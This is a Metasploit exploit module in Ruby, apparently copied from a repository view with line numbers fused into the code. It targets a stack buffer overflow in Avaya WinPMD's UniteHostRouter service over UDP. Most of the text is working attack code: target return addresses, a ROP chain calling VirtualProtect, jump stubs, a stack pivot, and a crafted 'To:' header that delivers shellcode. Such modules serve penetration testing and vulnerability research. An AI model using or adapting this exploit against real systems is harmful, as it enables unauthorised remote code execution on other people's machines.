Path: blob/master/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Udp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Avaya WinPMD UniteHostRouter Buffer Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability17exists in the UniteHostRouter service, due to the insecure usage of memcpy when18parsing specially crafted "To:" headers. The module has been tested successfully on19Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 2003 SP2.20},21'Author' => [22'AbdulAziz Hariri', # Vulnerability discovery23'Unknown', # Abysssec, PoC24'juan vazquez' # Metasploit module25],26'References' => [27['OSVDB', '82764'],28['OSVDB', '73269'],29['BID', '47947'],30['EDB', '18397'],31['URL', 'https://downloads.avaya.com/css/P8/documents/100140122'],32['URL', 'http://web.archive.org/web/20110527165515/http://secunia.com:80/advisories/44062']33],34'Payload' => {35'BadChars' => "\x00\x0d\x0a\x20\x2f\x3a\x3f",36'Space' => 1024,37'DisableNops' => true38},39'Platform' => 'win',40'Targets' => [41[42'Avaya WinPMD 3.8.2 / Windows XP SP3',43{44'Offset' => 260,45'Ret' => 0x77c2e93b # MOV EAX,EDI # POP EDI # RETN from msvcrt46}47],48[49'Avaya WinPMD 3.8.2 / Windows 2003 SP2',50{51'Offset' => 260,52'Ret' => 0x0040e0f2 # ADD ESP,44 # POP ESI # ADD ESP,0C8 # RETN from UniteHostRouter.EXE53}54]55],56'Privileged' => true,57'DisclosureDate' => '2011-05-23',58'DefaultTarget' => 0,59'Notes' => {60'Reliability' => UNKNOWN_RELIABILITY,61'Stability' => UNKNOWN_STABILITY,62'SideEffects' => UNKNOWN_SIDE_EFFECTS63}64)65)6667register_options([ Opt::RPORT(3217) ])68end6970def junk(n = 4)71return rand_text_alpha(n).unpack("V")[0].to_i72end7374def nop75return make_nops(4).unpack("V")[0].to_i76end7778def exploit79connect_udp8081if target.name =~ /Windows XP SP3/82buf = "\xeb\x7f" # jmp short $+0x8183buf << rand_text(0x81 - 2)84buf << "\xeb\x7f" # jmp short $+0x8185buf << rand_text(0x81 - 2)86buf << "\xeb\x64" # jmp short $+0x66 # jmp to shellcode in the heap87buf << [target.ret].pack("V") # MOV EAX,EDI # POP EDI # RETN # from msvcrt # EDI points to data in the heap88buf << [0x77c5f9a0].pack("V") # Readable address with string # from msvcrt89buf << ([0x77c3c99c].pack("V")) * 21 # (INC EAX # RETN) * 21 # from msvcrt # EAX points to data in th heap, align to shellcode position90buf << [0x77c168cd].pack("V") # jmp eax # from msvcrt.dll # JMP to shellcode in the heap91elsif target.name =~ /Windows 2003 SP2/92rop_gadgets =93[940x77bb2563, # POP EAX # RETN950x77ba1114, # <- *&VirtualProtect()960x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN97junk,980x77bb0c86, # XCHG EAX,ESI # RETN990x77bc9801, # POP EBP # RETN1000x77be2265, # ptr to 'push esp # ret'1010x77bb2563, # POP EAX # RETN1020x03C0990F,1030x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)1040x77bb48d3, # POP EBX, RET1050x77bf21e0, # .data1060x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN1070x77bbfc02, # POP ECX # RETN1080x77bef001, # W pointer (lpOldProtect) (-> ecx)1090x77bd8c04, # POP EDI # RETN1100x77bd8c05, # ROP NOP (-> edi)1110x77bb2563, # POP EAX # RETN1120x03c0984f,1130x77bdd441, # SUB EAX, 03c0940f1140x77bb8285, # XCHG EAX,EDX # RETN1150x77bb2563, # POP EAX # RETN116nop,1170x77be6591, # PUSHAD # ADD AL,0EF # RETN118].pack("V*")119buf = rand_text(3) # padding120buf << rop_gadgets121buf << "\xeb\x7f" # jmp $+0x81122buf << rand_text(0x81 - 2)123buf << "\xeb\x25" # jmp short $+0x66 => to shellcode124buf << rand_text(target['Offset'] - buf.length)125buf << "\xf2\xe0\x40" # EIP => # ADD ESP,44 # POP ESI # ADD ESP,0C8 # RETN from [UniteHostRouter.EXE # stackpivot to heap126end127128request = "UTP/1 To: 127.0.0.1 /#{buf}\r\n\r\n"129130if target.name =~ /Windows 2003 SP2/131request << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500132end133134request << payload.encoded # The shellcode will be stored in the heap135136print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")137udp_sock.put(request)138disconnect_udp139end140end141142143